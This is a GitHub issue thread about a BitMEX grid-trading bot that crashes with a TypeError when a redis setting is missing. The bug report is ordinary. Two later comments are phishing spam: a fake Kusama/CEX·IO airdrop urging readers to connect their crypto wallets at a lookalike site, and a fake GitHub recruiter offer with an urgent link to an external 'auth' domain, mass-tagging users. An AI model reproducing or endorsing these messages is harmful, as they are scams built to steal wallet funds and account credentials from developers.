### ISSUE TITLE
Errors from redis when trying to run any .py strategy

### ISSUE THREAD

**Issue by nateflanders** [Nynia/BITMEX#2]
Getting an error on every .py strategy file when trying to run, something similar to the following:

`python3 test.py
/usr/local/lib/python3.6/dist-packages/swagger_spec_validator/validator20.py:53: SwaggerValidationWarning: Found "$ref: #/definitions/UserPreferences" with siblings that will be overwritten. See https://stackoverflow.com/a/48114924 for more information. (path #/definitions/User/properties/preferences)
  ref_dict['$ref'], '/'.join(path),
2019-08-23 09:14:41,618 - INFO - Connecting to wss://www.bitmex.com/realtime?subscribe=order:XBTUSD,quote:XBTUSD,order:XBTZ19,quote:XBTZ19
2019-08-23 09:14:41,619 - INFO - Authenticating with API Key.
2019-08-23 09:14:42,621 - INFO - Connected to WS.
2019-08-23 09:14:52,625 - INFO - Got all market data. Starting.
2019-08-23 09:14:52,625 - INFO - 从redis同步参数
Traceback (most recent call last):
  File "test.py", line 471, in <module>
    robot = GridStrategy()
  File "test.py", line 58, in __init__
    self.price_dist = int(self.redis_cli.hget(self.setting_ht, 'price_dist'))
TypeError: int() argument must be a string, a bytes-like object or a number, not 'NoneType'
`

**Comment by nateflanders** [comment]
@Nynia

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by NoneTypez** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
mw866, @BruceGao0118, @hiqhan, @sohailprasad, @djakaitis, @Gitleyla, @diggerwasgehtab, @shravanev, @oleg-schmidt, @eliashussary, @chairmenfrog, @bobofzhang, @vincentbd123, @m8urnett, @georgeyk, @chyonglong, @barajus, @xingjianpan, @xibre, @montagist
